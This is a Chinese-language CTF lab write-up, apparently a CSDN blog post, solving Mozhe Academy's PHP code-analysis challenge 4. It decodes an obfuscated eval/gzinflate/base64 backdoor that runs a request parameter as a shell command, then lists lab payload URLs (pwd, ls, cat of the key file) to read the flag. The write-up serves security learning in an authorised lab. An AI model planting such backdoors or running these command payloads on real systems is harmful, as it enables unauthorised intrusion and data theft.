今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题)。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、题目简介

今天,我们对墨者学院PHP代码分析溯源(第四题)进行学习,该题目地址为:https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe,打开后页面如下所示:

我们启动该靶场环境,打开后结果如下所示:

二、破解源码

从题目题设来看,我们需要做的第一步就是破解源码,我们先把题目中源代码复制下来,去掉最外层的eval函数后,添加echo函数,并将其复制为本地的PHP文件,文件内容如下所示:

<?php
echo gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"));
?>

之后,我们搭建好本地PHP环境,然后尝试访问该页面,结果如下所示:

从上图中可以看出,上述源代码在解析后,最外层是一个eval()函数的代码执行函数,而内层使用了反引号将代码执行转化为了命令执行,我们可以使用任意方式提交参数a,作为命令执行的输入。

三、命令执行拿到key

接下来,我们就可以利用a参数来提交命令,进而获得key了。首先,我们先查看当前web系统所在目录,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=pwd

结果如下所示:

从上图中可以看出,当前网页根目录是/var/www/html,之后,我们来查看一下根目录内部有什么文件,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=ls%20/var/www/html

该payload执行后结果如下所示:

在得到根目录下的文件后,我们怀疑key_813517043132.php文件即隐藏着key值,因此,我们尝试打开访问该文件,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=cat%20key_813517043132.php

该payload执行后,结果如下所示:

我们需要打开文件网页源代码,就可以查看到该文件中的key值了。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

墨者学院 PHP代码分析溯源(第4题) 详解相关推荐

  1. 墨者学院-PHP代码分析溯源(第4题)

    PHP代码分析溯源(第4题) 难易程度:★★★ 题目类型:命令执行 使用工具:FireFox浏览器 1.打开靶场,看到一串php代码. 2.使用echo,运行一下代码. <?php echo(g ...

  2. 墨者学院 - WebShell代码分析溯源(第8题)

    审查代码 1.先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2.没有新的发现,就去目录查找,根据最后的修改时间排查. C:\Users\BayernChenTutu\D ...

  3. 墨者学院 - PHP代码分析溯源(第4题)

    打开发现提示key在根目录,且给出代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCA ...

  4. 墨者学院 - PHP代码分析溯源(第2题)

    根据题干看了好久的php隐式转换... 还是毫无头绪... 这样的逻辑几乎是无解的... md5(QNKCDZO,32) = 0e830400451993494058024219903391 根据PH ...

  5. 墨者学院-编辑器漏洞分析溯源(第1题)

    编辑器漏洞分析溯源(第1题) 难易程度:★★ 题目类型:编辑器漏洞 使用工具:FireFox浏览器.burpsuite.菜刀 1.打开靶场,看到提示信息显示fckeditor. 2.首先查看fcked ...

  6. 墨者学院-Bash漏洞分析溯源

    Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下 发现有目录/cgi ...

  7. 代码分析 | 单细胞转录组数据整合详解

    两种整合方法详解 NGS系列文章包括NGS基础.转录组分析 (Nature重磅综述|关于RNA-seq你想知道的全在这).ChIP-seq分析 (ChIP-seq基本分析流程).单细胞测序分析 (重磅 ...

  8. WebShell代码分析溯源(第1题)墨者学院

    一.访问链接 二.下载系统源码后直接放到D盾里扫描,扫到后门文件 三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']) ...

  9. 墨者学院 - Bash漏洞分析溯源

    bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...

最新文章

  1. 014_Spring事务
  2. hdu1051 Wooden Sticks
  3. mysql 查询表总行数字段_mysql中怎么查询表中的字段个数
  4. IDEA 上位?不!Eclipse Theia 1.0 发布!
  5. matlab与钻井平台,基于MATLAB环境下采用C8051F060实现钻井井眼姿态监测系统的设计...
  6. Communication boosts value
  7. boost::dynamic_bitset模块boost::hash的测试程序
  8. 一道面试题目引发的思考
  9. RabbitMQ学习系列(二): RabbitMQ安装与配置
  10. JVM第五部分 高效并发
  11. PAT乙类1008之数组元素循环右移问题
  12. 去年每天入账25个亿,没错,我就是佩奇
  13. Github更优雅的使用:Chrome插件推荐
  14. 网络无人自动安装centos 6.2 + PXE + httpd + kickstart
  15. 1.android源码编译android-7.1.2_r39
  16. 根据用户输入的参数的个数来计算长方形或正方形的面积_小面积(2-4.5㎡)卫生间,怎么做干湿分离?(附:方案+参数+案例)...
  17. webstorm主题风格jar包下载
  18. 用 ASTERISK 搭建自己的免费 VOIP 服务器
  19. 使用pdfFactory Pro虚拟打印机给文档加上水印
  20. 前端表白Html+css+js,表白源码,520和七夕告白,雪花爱心记录

热门文章

  1. 朋友圈看不起?!热文随便看不花钱!
  2. 桌面只能进入计算机,win7进桌面黑屏只有鼠标不能进入桌面的终极办法
  3. arm_GPIO_简单编程例题
  4. SONiC中的SAI接口的操作指令以及相应的解释
  5. 为您解答微信打开网址后自动调用手机自带默认浏览器或提示选择浏览器打开是如何实现的
  6. 关于文档钓鱼和绕过杀毒软件的静态检测
  7. Golang地图的一些见解
  8. 关于SpringBoot整合Shiro并入redis缓存
  9. 计算机视觉(一)最后实战
  10. 北航计算机专硕学位证,北航硕士学位授予仪式及学位证书颁发流程